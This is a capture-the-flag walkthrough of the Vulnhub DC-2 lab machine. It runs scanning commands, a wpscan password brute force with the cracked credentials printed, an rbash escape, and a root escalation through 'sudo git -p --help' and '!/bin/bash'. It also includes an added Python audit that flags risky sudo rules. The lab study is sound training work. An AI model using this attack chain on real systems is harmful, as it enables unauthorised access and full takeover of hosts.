Vulnhub Target Machine Walkthrough Series: DC-2
Information gathering
Internal network scan
arp-scan -l
Kali ip: 192.168.175.134
DC-2 ip: 192.168.175.135
Scan the host
nmap -A 192.168.175.135
80/tcp open
nmap -sV -p- 192.168.175.135 //-sV detects the version of the software running on each open port; -p- scans all ports 0-65535
80/tcp open http
7744/tcp open ssh
Flag1
Visiting 192.168.175.135: the hostname dc-2 cannot be resolved locally
Add a hosts entry
vim /etc/hosts //edit /etc/hosts and add the target IP address and hostname
flag1 is found on the Flag page
It hints at cewl, the password wordlist generator
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
Flag2
flag1 hints that we can log in, but no login page is found by browsing the site normally
nikto -h dc-2 -o nikto-dc2.txt //scan the site structure with nikto
cat nikto-dc2.txt
http://dc-2/wp-login.php //the WordPress admin login page is wp-login.php by default
Visit the login page: http://dc-2/wp-login.php
Scan the site with wpscan
wpscan --url dc-2 -e u //enumerate users (-e u) with wpscan
User(s) Identified: admin jerry tom
Add the usernames
vim dc-2users.list //create a new .list file (e.g. dc-2users.list) and add the three discovered usernames to it
Generate a password wordlist
cewl dc-2 -w dc-2.dic //generate the wordlist dc-2.dic with cewl, the tool hinted at in flag1
Brute force with wpscan
wpscan --url dc-2 -U dc-2users.list -P dc-2.dic //brute force the users' passwords with wpscan; the passwords of tom and jerry are cracked successfully
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Log in as tom: nothing useful found
Log in as jerry: flag2 found
jerry login
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
Flag3
SSH login
ssh tom@192.168.175.135 -p 7744 //log in over ssh as tom
Flag 3:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Flag4
Set the environment variables
BASH_CMDS[a]=/bin/sh //map the command name a to /bin/sh
a //running a starts /bin/sh, escaping the rbash restriction
/bin/bash //switch to the bash interpreter
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin //set PATH (the original line was missing the $ before PATH)
su jerry //switch to user jerry
adipiscing //jerry's password
Flag 4:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
Final Flag
Privilege escalation
sudo -l //list the commands that can be run as root without a password; git is among them
sudo git -p --help //privilege escalation: -p forces git to show the help text in a pager
!/bin/bash //typed at the pager prompt, this spawns a root shell
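As an added defensive example (not part of the original walkthrough), the Python audit below parses `sudo -l` output like the one checked above and flags the NOPASSWD git rule that makes this escalation possible. The sample output and the /usr/bin/git path are constructed assumptions, not copied from the target.

```python
import re

# Constructed sample of `sudo -l` output in the shape a Debian host prints
# for a user with a single NOPASSWD rule (assumed, not taken from DC-2).
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

# Binaries that hand the terminal to a pager: git does so for `git -p`
# and `git --help`, which is exactly the escape used in this walkthrough.
PAGER_SPAWNING = {"git"}

# One sudo rule line: "(runas) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudo_l(text):
    """Return (command, reason) findings for risky rules in `sudo -l` output."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        # Rules follow the "User X may run the following commands" header.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas")
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            prog = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            if prog == "ALL":
                findings.append((cmd, f"unrestricted sudo as ({runas})"))
            elif prog in PAGER_SPAWNING:
                findings.append((cmd, f"{prog} spawns a pager as ({runas}): "
                                      "remove the rule rather than trust the binary"))
            elif nopasswd:
                findings.append((cmd, f"NOPASSWD as ({runas}): confirm the binary "
                                      "cannot execute other programs"))
    return findings
```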
Change the password
passwd root //change the root password
111111 //the password is changed to 111111
su root //switch to the root user
cd /root //enter root's home directory
ls //find final-flag.txt